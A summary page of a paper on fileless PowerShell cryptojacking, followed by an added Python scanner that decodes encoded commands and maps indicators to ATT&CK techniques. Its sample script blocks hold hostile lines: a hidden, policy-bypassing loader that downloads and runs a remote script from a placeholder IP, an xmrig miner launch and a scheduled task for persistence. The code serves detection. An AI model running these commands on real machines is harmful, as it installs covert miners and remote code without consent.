The Pulse of Fileless Cryptojacking Attacks: Malicious PowerShell Scripts
Said Varlioglu, Nelly Elsayed, Eva Ruhsar Varlioglu, Murat Ozer, Zag ElSayed

TL;DR
This paper analyzes fileless cryptojacking attacks carried out with PowerShell scripts, highlighting their stealth, the malicious patterns they share, and the growth of such attacks since 2017 as they exploit RCE vulnerabilities for initial access.
Contribution
It provides a comprehensive analysis of PowerShell-based fileless cryptojacking, identifying malicious patterns and their evolution over time within the MITRE ATT&CK framework.
Findings
PowerShell scripts are the primary tool for fileless cryptojacking.
Malicious patterns follow common tactics outlined in MITRE ATT&CK.
Cryptojacking attacks that exploit RCE vulnerabilities have risen since 2017.
Abstract
Fileless malware predominantly relies on PowerShell scripts, leveraging the native capabilities of Windows systems to execute stealthy attacks that leave little or no trace on the victim's disk. The effectiveness of the fileless method lies in its ability to remain operational on victim endpoints through in-memory execution, even if the attack is detected and the original malicious scripts are removed. Threat actors have increasingly used this technique, particularly since 2017, to conduct cryptojacking attacks. With the emergence of new Remote Code Execution (RCE) vulnerabilities in ubiquitous libraries, widespread cryptocurrency-mining attacks have become prevalent, often employing fileless techniques. This paper provides a comprehensive analysis of the PowerShell scripts used in fileless cryptojacking, dissecting their common malicious patterns and mapping them to the MITRE ATT&CK framework.
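The stealth described in the abstract is relative: the script never touches disk, but the PowerShell engine still sees its text. With Script Block Logging enabled, every executed script block (including the decoded content of a -EncodedCommand argument, which PowerShell expects as base64 over UTF-16LE) is recorded as event 4104 in the Microsoft-Windows-PowerShell/Operational log, and that text is where the paper's "common malicious patterns" become detectable. The scanner below is an added example, not code from the paper or its authors: it unwraps encoded layers, matches the recurring loader, miner and persistence indicators, and maps each hit to an ATT&CK technique. The indicator list, the technique mapping, and the four sample script blocks (with TEST-NET addresses) are this example's own constructions, not the paper's dataset or its table of techniques.

```python
"""Scan PowerShell script-block text for fileless-cryptojacking indicators.

Added example (not from the paper). Inputs are constructed to resemble the
ScriptBlockText field of Windows event 4104. The ATT&CK mapping is this
example's own illustrative choice, not the paper's mapping.
"""
import base64
import re

# -EncodedCommand accepts -e, -ec, -enc, -encoded, -encodedcommand; the
# argument is base64 over the UTF-16LE encoding of the script text.
ENCODED_RE = re.compile(
    r"-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# (regex, ATT&CK technique, description). Mapping is an assumption.
INDICATORS = [
    (ENCODED_RE.pattern, "T1027", "base64 -EncodedCommand"),
    (r"\biex\b|invoke-expression", "T1059.001", "in-memory execution via IEX"),
    (r"-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass",
     "T1059.001", "launcher flags (-nop / -ep bypass)"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
     "T1105", "remote payload fetch"),
    (r"-w(?:indowstyle)?\s+hidden", "T1564.003", "hidden window"),
    (r"stratum\+tcp://|xmrig|monero|--donate-level|cryptonight",
     "T1496", "miner configuration"),
    (r"schtasks|register-scheduledtask|new-scheduledtask",
     "T1053.005", "scheduled-task persistence"),
    (r"invoke-wmimethod|win32_process|\bwmic\b",
     "T1047", "WMI execution / lateral movement"),
]
COMPILED = [(re.compile(p, re.I), t, d) for p, t, d in INDICATORS]


def decode_encoded_command(blob):
    """Return the UTF-16LE text behind a -EncodedCommand blob, or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def expand(text, max_layers=5):
    """Unwrap nested -EncodedCommand layers; returns [outer, ..., innermost].

    Bounded so a hostile blob that keeps re-encoding itself cannot loop.
    """
    layers = [text]
    for _ in range(max_layers):
        match = ENCODED_RE.search(layers[-1])
        if not match:
            break
        decoded = decode_encoded_command(match.group(1))
        if decoded is None:
            break
        layers.append(decoded)
    return layers


def scan(text):
    """Return sorted (technique, description) hits across all decoded layers."""
    hits = set()
    for layer in expand(text):
        for pattern, tech, desc in COMPILED:
            if pattern.search(layer):
                hits.add((tech, desc))
    return sorted(hits)


def techniques(text):
    """Distinct ATT&CK technique IDs observed in one script block."""
    return sorted({tech for tech, _ in scan(text)})


def triage(script_blocks, min_techniques=2):
    """Flag blocks showing >= min_techniques distinct techniques.

    A lone IEX or DownloadString is common in legitimate admin tooling;
    requiring several techniques on one block is what cuts false positives.
    """
    flagged = []
    for index, block in enumerate(script_blocks):
        found = techniques(block)
        if len(found) >= min_techniques:
            flagged.append((index, found))
    return flagged


# Constructed stage-2 loader and its encoded form (hypothetical host).
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/m.ps1')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()

# Constructed sample script blocks: one benign, three malicious stages.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Logs -Recurse | Where-Object Length -gt 10MB",
    f"powershell -nop -w hidden -ep bypass -enc {_ENCODED}",
    "$a='stratum+tcp://203.0.113.9:3333'; Start-Process xmrig.exe "
    "-ArgumentList \"-o $a --donate-level=1\" -WindowStyle Hidden",
    "schtasks /create /sc hourly /tn Update /tr \"powershell -nop -w hidden "
    "-c IEX((New-Object Net.WebClient).DownloadString('http://203.0.113.7/m.ps1'))\"",
]

if __name__ == "__main__":
    for index, found in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {index}: {', '.join(found)}")
```

The decode step matters more than the regex list: the loader block on its own only shows an encoded argument and launcher flags, and it is the decoded layer that exposes the download-and-execute pattern. The same structure also makes the "remains operational after the script is removed" point from the abstract concrete: the scheduled task in the last sample re-fetches and re-executes the stage in memory, so deleting m.ps1 from the server or a dropped copy from disk does not stop the miner until the task is removed.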
Taxonomy
Topics: Advanced Malware Detection Techniques · Security and Verification in Computing · Network Security and Intrusion Detection
